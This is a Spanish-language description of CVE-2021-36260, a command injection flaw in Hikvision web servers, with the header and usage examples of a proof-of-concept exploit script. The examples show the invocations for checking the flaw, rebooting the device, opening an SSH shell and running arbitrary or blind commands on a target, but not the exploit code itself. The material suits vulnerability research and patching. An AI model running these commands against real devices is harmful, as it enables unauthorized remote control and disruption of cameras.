
Vulnerabilidad de inyección de comandos en el servidor web de algunos productos Hikvision. Debido a la validación de entrada insuficiente, un atacante puede explotar la vulnerabilidad para lanzar un ataque de inyección de comandos enviando algunos mensajes con comandos maliciosos.
CVE-2021-36260 POC, vulnerabilidad de inyección de comandos en el servidor web de algunos productos Hikvision. Debido a la validación de entrada insuficiente, un atacante puede explotar la vulnerabilidad para lanzar un ataque de inyección de comandos enviando mensajes con comandos maliciosos.
Título del Exploit: Hikvision Web Server Build 210702 - Command Injection Autor del Exploit: bashis Página del proveedor: https://www.hikvision.com/ Versión: 1.0 CVE: CVE-2021-36260 Referencia: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Nota:
[Ejemplos] Comprobación segura de vulnerabilidad/verificación: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Comprobación segura e insegura de vulnerabilidad/verificación: (solo se usará 'unsafe check' si no se verifica con 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Comprobación insegura de vulnerabilidad/verificación: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Iniciar y conectar al shell SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Ejecutar comando: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Ejecutar comando ciego: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"